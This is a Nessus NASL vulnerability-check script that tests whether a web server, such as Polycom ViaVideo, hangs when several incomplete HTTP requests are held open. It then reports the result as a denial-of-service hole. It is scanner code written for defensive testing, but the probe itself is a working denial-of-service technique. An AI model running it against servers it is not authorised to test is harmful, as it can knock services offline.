#
# This script was written by Michel Arboi <arboi@alussinan.org>
# It is released under the GNU Public Licence (GPLv2)
#
########################
# References:
########################
# 
# Date:	 Mon, 14 Oct 2002 08:27:54 +1300 (NZDT)
# From:	advisory@prophecy.net.nz
# To:	bugtraq@securityfocus.com
# Subject: Security vulnerabilities in Polycom ViaVideo Web component
#
########################

if(description)
{
 script_id(11825);
 script_bugtraq_id(5962);
 script_version ("$Revision: 1.7 $");
 #script_cve_id();
 
 name["english"] = "Polycom ViaVideo denial of service";
 script_name(english:name["english"]);
 
 desc["english"] = 
"The remote web server locks up when several incomplete web 
requests are sent and the connections are kept open.

Some servers (e.g. Polycom ViaVideo) even run an endless loop, 
using much CPU on the machine. Nessus has no way to test this, 
but you'd better check your machine.


Solution : Contact your vendor for a patch
Risk factor : High

Solution : Upgrade your web server";

 desc["francais"] = 
"Le server web  se fige quand on lui envoie plusieurs requtes 
HTTP incompltes tout en gardant les connexions ouvertes.

Certains serveurs (par exemple Polycom ViaVideo) partent mme dans
une boucle infinie, consommant trop de CPU sur la machine. Nessus ne
peut pas tester cel, mais vous devriez vrifier votre machine.


Facteur de risque : Elev

Solution : Mettez  jour votre serveur web.";

 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Several incomplete HTTP requests lock the server";
 summary["francais"] = "Plusieurs requtes HTTP incompltes verrouillent le serveur";
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_DENIAL);
 
 script_copyright(english:"This script is Copyright (C) 2003 Michel Arboi",
		francais:"Ce script est Copyright (C) 2003 Michel Arboi");
 family["english"] = "Denial of Service";
 script_family(english:family["english"]);
 script_dependencie("find_service.nes", "httpver.nasl");
 script_require_ports("Services/www",80);
 exit(0);
}

#

include("http_func.inc");

port = get_http_port(default:80);

if (! get_port_state(port)) exit(0);


if(http_is_dead(port:port))exit(0);

# 4 is enough for Polycom ViaVideo

n = 0;
for (i = 0; i < 6; i++)
{
  soc[i] = http_open_socket(port);
  if(soc[i])
  {
    n ++;
    req = http_get(item:"/", port:port);
    req -= '\r\n';
    send(socket:soc[i], data:req);
  }
}

##display(n, " connections were opened\n");

dead = 0;
if(http_is_dead(port: port, retry:1)) dead ++;

for (i = 0; i < 6; i++)
  if (! isnull(soc[i]))
    http_close_socket(soc[i]);

if(http_is_dead(port: port, retry:1)) dead ++;

if (dead == 2)
  security_hole(port);
else if (dead == 1)
{
  report=
"The remote web server locks up when several incomplete web 
requests are sent and the connections are kept open.

However, it runs again when the connections are closed.

Solution : Contact your vendor for a patch
Risk factor : Medium

Solution : Upgrade your web server";

  security_hole(port: port, data: report);
}
